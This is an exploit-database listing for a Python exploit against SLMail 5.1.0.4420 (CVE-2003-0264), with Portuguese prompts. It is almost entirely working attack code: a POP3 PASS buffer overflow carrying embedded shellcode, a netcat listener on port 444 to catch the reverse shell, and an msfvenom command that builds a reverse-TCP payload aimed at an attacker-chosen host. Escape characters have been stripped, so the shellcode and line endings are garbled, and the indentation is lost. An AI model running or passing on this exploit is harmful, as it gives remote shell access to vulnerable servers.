Authored by mednic | Site github.com

SLMail version 5.1.0.4420 remote code execution exploit.

advisories | CVE-2003-0264

# -*- coding: utf-8 -*-
import socket
from time import sleep
from os import system

system("clear")
print 'Shell-code-foi-informada?rn'
print '[1] sim'
print '[2] naon'
quest = int(input('>>> '))

def main():
system("clear")
#============================
#--ensira-sua-shell-code-aqui

buf = ""
buf += "xb8xaax62xd3xeaxdaxd4xd9x74x24xf4x5ex29"
buf += "xc9xb1x52x31x46x12x03x46x12x83x44x9ex31"
buf += "x1fx64xb7x34xe0x94x48x59x68x71x79x59x0e"
buf += "xf2x2ax69x44x56xc7x02x08x42x5cx66x85x65"
buf += "xd5xcdxf3x48xe6x7exc7xcbx64x7dx14x2bx54"
buf += "x4ex69x2ax91xb3x80x7ex4axbfx37x6exffxf5"
buf += "x8bx05xb3x18x8cxfax04x1axbdxadx1fx45x1d"
buf += "x4cxf3xfdx14x56x10x3bxeexedxe2xb7xf1x27"
buf += "x3bx37x5dx06xf3xcax9fx4fx34x35xeaxb9x46"
buf += "xc8xedx7ex34x16x7bx64x9exddxdbx40x1ex31"

#===========================

print 'Exploit - CVE-2003-0264nplatfor: windowsnPOP3 SLmail-5.5 overflow :)'
print 'nby: - Mednic -rn'
host = raw_input('Host: ')

buffer = "A" * 2606 + "x8fx35x4ax5f" + "x90" * 39 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sleep(3)
print 'nIniciando conexão ao servidor...n'
sleep(2)
try:
s.connect((host, 110))
s.recv(1024)
except:
print 'Conexão recusada !'
exit()
s.settimeout(1)
print 'nEnviando usuario...n'
s.send("USER guestrn")
s.recv(1024)
s.settimeout(1)
print 'nIniciando estouro de buffer...n'
system('nc -nlvp 444')
s.send("PASS "+buffer+"rn")
s.recv(1024)
s.send("QUITrn")
s.close()

if quest == 1:
main()

elif quest == 2:
print "IP para conexão reversa !"
ip = raw_input('>>> ')
system('clear')
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'x00x0ax0dx20'+" -f python")
print 'rnCopie e substitua pelo setado no codigo !'
else:
print 'Invalido argumento'
exit()